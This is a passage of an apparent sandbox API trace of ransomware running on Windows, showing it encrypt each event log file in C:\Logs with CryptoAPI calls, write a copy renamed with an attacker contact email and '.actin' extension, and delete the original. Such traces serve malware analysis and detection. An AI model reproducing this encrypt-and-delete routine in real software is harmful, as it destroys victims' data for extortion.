liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.229] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.229] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d00) returned 1 [0063.229] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.229] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0063.231] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0063.231] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.588] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72000) returned 1 [0063.588] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.588] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0063.588] CryptDestroyKey (hKey=0xf72000) returned 1 [0063.588] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0063.588] CryptDestroyKey (hKey=0xf71d00) returned 1 [0063.588] CloseHandle (hObject=0x338) returned 1 [0063.588] CloseHandle (hObject=0x344) returned 1 [0063.590] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 1 [0064.005] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.005] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0064.006] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.006] CloseHandle (hObject=0x2e4) returned 1 [0064.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 0x20 [0064.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.006] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0064.006] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.006] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.006] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.006] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0064.006] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.006] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.008] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.008] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.010] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c00) returned 1 [0064.010] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.010] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0, dwBufLen=0xa0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0) returned 1 [0064.010] CryptDestroyKey (hKey=0xf71c00) returned 1 [0064.010] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x152, lpOverlapped=0x0) returned 1 [0064.010] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0064.010] CloseHandle (hObject=0x2e4) returned 1 [0064.010] CloseHandle (hObject=0x300) returned 1 [0064.012] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 1 [0064.014] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.014] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.014] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.014] CloseHandle (hObject=0x300) returned 1 [0064.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 0x20 [0064.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.014] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.014] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.014] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.014] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.015] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f80) returned 1 [0064.015] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.015] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.017] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.017] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.019] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0064.019] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.019] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0064.019] CryptDestroyKey (hKey=0xf71f40) returned 1 [0064.019] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0064.019] CryptDestroyKey (hKey=0xf71f80) returned 1 [0064.019] CloseHandle (hObject=0x300) returned 1 [0064.020] CloseHandle (hObject=0x328) returned 1 [0064.021] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 1 [0064.023] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.023] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.023] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.023] CloseHandle (hObject=0x328) returned 1 [0064.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 0x20 [0064.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.023] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.023] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.023] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.023] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.024] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72080) returned 1 [0064.024] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.024] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.027] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.027] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.029] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71dc0) returned 1 [0064.029] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.029] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0064.029] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0064.029] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0064.029] CryptDestroyKey (hKey=0xf72080) returned 1 [0064.029] CloseHandle (hObject=0x328) returned 1 [0064.029] CloseHandle (hObject=0x300) returned 1 [0064.031] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 1 [0064.032] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.032] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.034] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.034] CloseHandle (hObject=0x300) returned 1 [0064.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 0x20 [0064.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.034] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.034] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.034] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.034] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.035] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0064.035] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.035] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.036] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.036] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.038] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0064.038] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.038] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0064.038] CryptDestroyKey (hKey=0xf71a00) returned 1 [0064.038] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0064.038] CryptDestroyKey (hKey=0xf71b00) returned 1 [0064.038] CloseHandle (hObject=0x300) returned 1 [0064.038] CloseHandle (hObject=0x328) returned 1 [0064.040] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 1 [0064.041] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.041] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.355] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.355] CloseHandle (hObject=0x30c) returned 1 [0064.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 0x20 [0064.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.355] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.355] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.355] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.356] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.357] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e00) returned 1 [0064.357] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.357] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.359] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.359] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.361] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0064.361] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.361] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0064.362] CryptDestroyKey (hKey=0xf71b00) returned 1 [0064.362] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0064.362] CryptDestroyKey (hKey=0xf71e00) returned 1 [0064.362] CloseHandle (hObject=0x30c) returned 1 [0064.362] CloseHandle (hObject=0x338) returned 1 [0064.364] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 1 [0064.366] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.366] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.366] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.366] CloseHandle (hObject=0x338) returned 1 [0064.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 0x20 [0064.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API 